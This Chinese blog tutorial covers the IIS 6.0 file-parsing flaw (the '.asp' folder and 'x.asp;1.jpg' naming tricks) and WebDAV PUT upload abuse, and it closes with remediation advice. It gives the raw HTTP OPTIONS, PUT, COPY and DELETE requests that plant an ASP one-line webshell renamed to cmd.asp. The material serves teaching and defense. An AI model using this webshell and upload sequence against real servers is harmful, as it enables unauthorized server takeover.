中间件解析漏洞-IIS6.0

最新推荐文章于 2025-07-22 19:39:13 发布
最新推荐文章于 2025-07-22 19:39:13 发布
阅读量765 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_25899635/article/details/90415351
本文介绍了IIS6.0解析漏洞,如特定文件夹下文件被当asp解析、特定文件名被按asp解析,微软未推出补丁。还阐述了IIS6.0 PUT上传原理、探测方法及利用工具,列出默认可执行文件类型,最后给出修复方案,如编写正则、做好权限设置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

IIS6.0解析漏洞介绍
(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将会被IIS当做asp解析。<%=NOW()%>
(2) 当文件.asp;1.jpg IIS6.0同样会将文件作为asp文件解析。
微软目前也没有推出补丁,不认为这是一个漏洞。
IIS6.0 PUT上传原理
WebDAV 基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1、探测是否存在IIS PUT漏洞。
OPTIONS / HTTP1.1
Host: www.xxx.com

2、上传txt文本文件
PUT /a.txt HTTP1.1
Host: www.xxx.com
Content-Length:30
<%eval request(“chopper”)%>

3、通过Move或Copy重命名
COPY /a.txt HTTP1.1
Host: www.xxx.com
Destination:
http://www.xxx.com/cmd.asp

4、删除
DELETE /a.txt HTTP1.1
Host: www.xxx.com

IIS6.0 PUT上传探测
利用nikto探测
nikto -h IP地址
在这里插入图片描述
IIS6.0 PUT上传利用
此时就可以利用Burpsuite进行IIS PUT漏洞利用。先用OPTIONS探测、PUT、MOVE、DELETE
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
IIS6.0解析文件类型
IIS6.0默认的可执行文件除了asp还有下面的三种:
/test.asa
/test.cer
/test.cdx
IIS文件解析漏洞修复方案
1、目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
2、做好权限设置,限制用户创建文件夹。

【网络安全】网站中间件存在的解析漏洞
你在看屏幕的同时,屏幕也在注视着你
07-24 1864
常见的中间件解析漏洞
常见框架漏洞 中(IIS6.x、IIS7.x、Apache、Nginx)
2301_76631050的博客
08-07 1380
目录中间件IISIIS6.x篇PUT漏洞漏洞描述环境漏洞复现漏洞复现工具连接IIS6.0解析漏洞IIS短文件漏洞漏洞描述原理复现短⽂件名特征:⼯具IIS RCE-CVE-2017-7269简介影响范围复现利⽤⼯具反弹shellApache未知扩展名解析漏洞AddHandler导致的解析漏洞目录遍历漏洞原理复现Apache HTTPD 换行解析漏洞(CVE-2017-15715)Nginx文件解析漏洞目录遍历漏洞描述原理漏洞复现CRLF注⼊漏洞复现文件名逻辑漏洞(CVE-2013-4547)描述环境漏洞复现中
Web中间件漏洞总结——IIS
2401_88858891的博客
11-20 1442
它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,如PUT,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。可以像在操作本地文件夹一样操作服务器上的文件夹,该扩展也存在缺陷,利用PUT方法可直接向服务器上传恶意文件,控制服务器。为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的windows 8.3 短文件名。
38、中间件漏洞解析-IIS6.0
Web安全工具库
02-10 340
一、新建一个1.asp文件,内容为:<%=now()%>,放进IIS6.0服务器中。 二、访问192.168.1.152:8011/1.asp,成功访问,获取当前时间 三、将1.asp修改为1.asa,然后访问192.168.1.152:8011/1.asa,除了*.asa,还有*.cer *.cdx都会被解析asp文件,从而绕过上传机制。 四、将1.asp修改为1.asp;1....
IIS中间件漏洞
m0_67189356的博客
09-20 3420
web中间件漏洞总结——IIS
中间件漏洞 -- IIS
weixin_44769042的博客
11-07 2561
中间件漏洞记录--1 目录 1.解析漏洞 iis6.0 漏洞原理 漏洞复现 win2003+iis6.0 1> 文件夹解析漏洞 2> 扩展名解析漏洞 iis7.0/7.5 原理 漏洞复现 IIS7.5 + Fast-CGI 2.PUT漏洞 漏洞原理 漏洞复现win2003+iis6.0 1> 开始测试 3.短文件名 漏洞原理 漏洞复现 win2003+WebDAV+ASP.NET 1> 如果文件名长度 >= 9,就会产生短文件名 2&g.
第一节 中间件解析漏洞-IIS6.0-01
09-15
"中间件解析漏洞-IIS6.0-01" 中间件解析漏洞是指在Web应用程序中,因服务器或中间件解析机制存在漏洞,导致攻击者可以上传恶意文件,从而控制服务器或获取敏感信息。下面将对IIS6.0中间件解析漏洞进行详细介绍。 ...
WEB攻防-IIS中间件PUT漏洞
weixin_45534587的博客
04-24 801
它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,如PUT,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。可以像在操作本地文件夹一样操作服务器上的文件夹,该扩展也存在缺陷,利用PUT方法可直接向服务器上传恶意文件,控制服务器。如果移动成功,源资源通常会被删除,而内容则出现在新的 URI 下。使用桂林老兵工具上传一句话木马 ,直接上传asp会根据特性被解析,无法上传。
【文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3703
(1)第一种:未知扩展名解析漏洞 Apache对文件的解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析为PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
中间件安全:IIS 解析漏洞.[6.0版本]
网络安全领域___专研者.
04-16 4688
中间件的概括: 中间件是指提供系统软件 和应用软件 之间连接的软件,以便于软件各部件之间的沟通,特别是应用软件对于系统软件的集中的逻辑,在现代信息技术应用框架(比如:Web服务、面向服务的体系结构等中应用比较广泛.
中间件解析漏洞iis6iis7、nginx、apache)
最新发布
m0_75212639的博客
07-22 744
iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。中间件iis6的网站部署完成我们写入一个1.txt文件,一个a.asp目录,在目录中还有一个1.txt文件内容为 <%=new()%> 这是一段显示当前时间的asp代码我们查看文件1.txt 可以看到文件内容没有被解析再打开a.asp目录下的1.txt发现它被解析了畸形文件解析IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;
web常见中间件漏洞IIS中间件漏洞
qq_52486507的博客
03-30 1409
1.IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。2.IIS一般适用于windows系统,而不适用于其它系统。
iis常见漏洞中间件常见漏洞
热门推荐
qq_56438857的博客
08-17 1万+
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS.net两个条件都满足。...
常见中间件漏洞IIS
2302_77611368的博客
03-24 277
PUT漏洞PUT漏洞
技巧-深入浅出带你学习IIS中间件常见漏洞-零开始网络安全笔记
程序员六七的博客
05-17 358
本文正在参加「金石计划 . 瓜分6万现金大奖」前言在渗透过程中我们经常会思考如何去进行渗透,假如给了我们一个有很多中间件的网站我们要如何进行渗透呢?
iis中间件_浅谈中间件漏洞与防护
weixin_39988888的博客
12-01 477
  中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。那么从实际情况来看,预防这种漏洞最大的难点,在于中间件安全该由谁负责?  我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重...
解析漏洞——中间件
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-21 4288
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
深入浅出带你学习IIS中间件常见漏洞
郊眠寺
02-16 988
简单总结了一下IIS中间件的常见漏洞以及攻击方法不知道大家学会了没有,文章主要还是讲了IIS解析漏洞的实现方法,有兴趣的小伙伴不妨去搭建一个靶机去测试一下,喜欢本文的小伙伴不妨一键三连支持一下。整理了75个JS高频面试题,并给出了答案和解析,基本上可以保证你能应付面试官关于JS的提问。
一篇了解Java反射
qq_44005305的博客
09-10 144
1.Class也是类,也继承Object类2.Class类对象不是new出来的,而是系统创建的 (都是通过Classloader类创建的)3.每个类的Class类对象,在内存中只有一份,因为类只加载一次。
IIS6.0中间件解析漏洞与PUT上传技术解析
"IIS6.0中间件解析漏洞及PUT上传原理" 在网络安全领域,中间件解析漏洞是常见的安全问题之一,特别是在旧版本的Web服务器软件中,如IIS6.0。本节主要讲解了IIS6.0中间件的一个特定解析漏洞以及利用PUT方法进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值